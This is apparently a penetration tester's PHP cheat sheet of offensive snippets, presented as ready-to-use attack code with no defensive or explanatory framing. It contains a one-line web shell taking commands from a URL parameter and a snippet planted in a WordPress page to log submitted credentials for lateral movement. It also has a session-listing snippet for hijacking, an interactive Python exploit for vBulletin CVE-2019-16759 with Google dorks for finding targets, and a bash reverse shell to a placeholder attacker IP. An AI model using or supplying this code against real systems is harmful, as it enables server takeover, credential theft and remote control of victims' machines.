Php

start a HTTP server

python -m http.server 8000

Simple PHP Shell: https://github.com/heiswayi/simple-php-shell/blob/master/shell.php

// See which functions are enabled
<?php
print_r(preg_grep("/^(system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source)$/", get_defined_functions(TRUE)["internal"]));
?>

Simple php shell

// Some code
<?php system($_GET['cmd']);?>

// get all Sessions (to use in cookie PHPSESSID
<?php
print_r(scandir(session_save_path()));
?>

Capturing WP creds

// capturing wp creds for lateral movement
// to grab login etc insert before wp user page

<?php file_put_contents('log.txt',file_get_contents('php://input')); ?>

// PhpMailer RCE in WP
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

// Vbulletin RCE - CVE-2019-16759 (vBulletin RCE)
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
 
import requests
import sys
 
if len(sys.argv) != 2:
   sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
 
params = {"routestring":"ajax/render/widget_php"}
 
while True:
    try:
         cmd = input("vBulletin$ ")
         params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
         r = requests.post(url = sys.argv[1], data = params)
         if r.status_code == 200:
              print(r.text)
         else:
              sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
         sys.exit("\nClosing shell...")
    except Exception as e:
         sys.exit(str(e))

base64 decode

// Some code
echo 'bGludXhoaW50LmNvbQo=' | base64 --decode

simple php reverse shell

// Some code
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

// Code
 <?php
$myfile = fopen("webdictionary.txt", "r") or die("Unable to open file!");
echo fread($myfile,filesize("webdictionary.txt"));
fclose($myfile);
?> 

<?php
$dir = ".";
$files1 = scandir($dir);
$files2 = scandir($dir,1);
print_r($files1);
print_r($files2);
?>